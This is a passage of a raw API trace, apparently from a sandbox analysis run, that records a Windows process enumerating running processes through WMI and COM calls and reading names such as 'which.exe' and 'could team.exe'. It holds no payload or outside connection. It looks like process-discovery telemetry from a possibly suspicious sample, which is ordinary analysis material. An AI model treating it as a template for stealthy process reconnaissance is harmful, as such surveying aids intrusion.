Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5701fd0) returned 0x0 [0279.233] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701fd0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.233] WbemDefPath:IUnknown:AddRef (This=0x5701fd0) returned 0x3 [0279.233] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701fd0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.233] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701fd0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.233] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701fd0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc088) returned 0x0 [0279.233] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc088, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.233] WbemDefPath:IUnknown:Release (This=0x56fc088) returned 0x3 [0279.233] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.233] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.233] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701fd0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.233] WbemDefPath:IUnknown:Release (This=0x5701fd0) returned 0x2 [0279.233] WbemDefPath:IUnknown:Release (This=0x5701fd0) returned 0x1 [0279.233] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.233] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.233] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701fd0, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5701fd0) returned 0x0 [0279.233] WbemDefPath:IUnknown:AddRef (This=0x5701fd0) returned 0x3 [0279.233] WbemDefPath:IUnknown:Release (This=0x5701fd0) returned 0x2 [0279.233] WbemDefPath:IWbemPath:SetText (This=0x5701fd0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2396\"") returned 0x0 [0279.233] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.233] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.234] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.234] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.234] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.234] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.234] IWbemClassObject:Get (in: This=0x5965f0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c4360*=0, plFlavor=0x27c4364*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="which.exe", varVal2=0x0), pType=0x27c4360*=8, plFlavor=0x27c4364*=0) returned 0x0 [0279.234] SysStringByteLen (bstr="which.exe") returned 0x12 [0279.234] SysStringByteLen (bstr="which.exe") returned 0x12 [0279.234] IWbemClassObject:Get (in: This=0x5965f0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c4360*=8, plFlavor=0x27c4364*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="which.exe", varVal2=0x0), pType=0x27c4360*=8, plFlavor=0x27c4364*=0) returned 0x0 [0279.234] SysStringByteLen (bstr="which.exe") returned 0x12 [0279.234] SysStringByteLen (bstr="which.exe") returned 0x12 [0279.234] CoTaskMemAlloc (cb=0x4) returned 0x56fc0b8 [0279.234] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc0b8, puReturned=0x27bb39c | out: apObjects=0x56fc0b8*=0x5703680, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.236] IUnknown:QueryInterface (in: This=0x5703680, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5703680) returned 0x0 [0279.236] IUnknown:QueryInterface (in: This=0x5703680, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.236] IUnknown:QueryInterface (in: This=0x5703680, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.237] IUnknown:AddRef (This=0x5703680) returned 0x3 [0279.237] IUnknown:QueryInterface (in: This=0x5703680, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.237] IUnknown:QueryInterface (in: This=0x5703680, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.237] IUnknown:QueryInterface (in: This=0x5703680, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5703684) returned 0x0 [0279.237] IMarshal:GetUnmarshalClass (in: This=0x5703684, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.237] IUnknown:Release (This=0x5703684) returned 0x3 [0279.237] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.237] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.237] IUnknown:QueryInterface (in: This=0x5703680, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.237] IUnknown:Release (This=0x5703680) returned 0x2 [0279.237] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.237] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.237] IUnknown:QueryInterface (in: This=0x5703680, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5703680) returned 0x0 [0279.237] IUnknown:AddRef (This=0x5703680) returned 0x4 [0279.237] IUnknown:Release (This=0x5703680) returned 0x3 [0279.237] IUnknown:Release (This=0x5703680) returned 0x2 [0279.237] CoTaskMemFree (pv=0x56fc0b8) [0279.237] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.237] IUnknown:AddRef (This=0x5703680) returned 0x3 [0279.237] IWbemClassObject:Get (in: This=0x5703680, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.238] IWbemClassObject:Get (in: This=0x5703680, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.238] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"") returned 0x66 [0279.238] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"") returned 0x66 [0279.238] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.238] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.238] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.238] IUnknown:Release (This=0x500344) returned 0x1 [0279.239] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc0b8) returned 0x0 [0279.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc0b8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.239] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc0b8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x57020b0) returned 0x0 [0279.239] WbemDefPath:IUnknown:Release (This=0x56fc0b8) returned 0x0 [0279.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x57020b0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x57020b0) returned 0x0 [0279.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x57020b0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.240] WbemDefPath:IUnknown:AddRef (This=0x57020b0) returned 0x3 [0279.240] WbemDefPath:IUnknown:QueryInterface (in: This=0x57020b0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.240] WbemDefPath:IUnknown:QueryInterface (in: This=0x57020b0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.240] WbemDefPath:IUnknown:QueryInterface (in: This=0x57020b0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc0c8) returned 0x0 [0279.240] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc0c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.240] WbemDefPath:IUnknown:Release (This=0x56fc0c8) returned 0x3 [0279.240] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.240] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.240] WbemDefPath:IUnknown:QueryInterface (in: This=0x57020b0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.240] WbemDefPath:IUnknown:Release (This=0x57020b0) returned 0x2 [0279.240] WbemDefPath:IUnknown:Release (This=0x57020b0) returned 0x1 [0279.240] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.240] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.240] WbemDefPath:IUnknown:QueryInterface (in: This=0x57020b0, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x57020b0) returned 0x0 [0279.240] WbemDefPath:IUnknown:AddRef (This=0x57020b0) returned 0x3 [0279.240] WbemDefPath:IUnknown:Release (This=0x57020b0) returned 0x2 [0279.240] WbemDefPath:IWbemPath:SetText (This=0x57020b0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"") returned 0x0 [0279.240] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.240] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.241] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.241] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.241] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.241] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.241] IWbemClassObject:Get (in: This=0x5703680, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c4bc4*=0, plFlavor=0x27c4bc8*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="could team.exe", varVal2=0x0), pType=0x27c4bc4*=8, plFlavor=0x27c4bc8*=0) returned 0x0 [0279.241] SysStringByteLen (bstr="could team.exe") returned 0x1c [0279.241] SysStringByteLen (bstr="could team.exe") returned 0x1c [0279.241] IWbemClassObject:Get (in: This=0x5703680, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c4bc4*=8, plFlavor=0x27c4bc8*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="could team.exe", varVal2=0x0), pType=0x27c4bc4*=8, plFlavor=0x27c4bc8*=0) returned 0x0 [0279.241] SysStringByteLen (bstr="could team.exe") returned 0x1c [0279.241] SysStringByteLen (bstr="could team.exe") returned 0x1c [0279.242] CoTaskMemAlloc (cb=0x4) returned 0x56fc0f8 [0279.242] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc0f8, puReturned=0x27bb39c | out: apObjects=0x56fc0f8*=0x5703818, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.243] IUnknown:QueryInterface (in: This=0x5703818, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5703818) returned 0x0 [0279.243] IUnknown:QueryInterface (in: This=0x5703818, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.243] IUnknown:QueryInterface (in: This=0x5703818, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.244] IUnknown:AddRef (This=0x5703818) returned 0x3 [0279.244] IUnknown:QueryInterface (in: This=0x5703818, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.244] IUnknown:QueryInterface (in: This=0x5703818, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.244] IUnknown:QueryInterface (in: This=0x5703818, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x570381c) returned 0x0 [0279.244] IMarshal:GetUnmarshalClass (in: This=0x570381c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.244] IUnknown:Release (This=0x570381c) returned 0x3 [0279.244] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.244] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.244] IUnknown:QueryInterface (in: This=0x5703818, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.244] IUnknown:Release (This=0x5703818) returned 0x2 [0279.244] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.244] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.244] IUnknown:QueryInterface (in: This=0x5703818, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5703818) returned 0x0 [0279.244] IUnknown:AddRef (This=0x5703818) returned 0x4 [0279.244] IUnknown:Release (This=0x5703818) returned 0x3 [0279.244] IUnknown:Release (This=0x5703818) returned 0x2 [0279.244] CoTaskMemFree (pv=0x56fc0f8) [0279.244] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.244] IUnknown:AddRef (This=0x5703818) returned 0x3 [0279.244] IWbemClassObject:Get (in: This=0x5703818, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.245] IWbemClassObject:Get (in: This=0x5703818, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2420\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.245] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2420\"") returned 0x66 [0279.245] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2420\"") returned 0x66 [0279.245] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.245] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.245] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.245] IUnknown:Release (This=0x500344) returned 0x1 [0279.246] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, 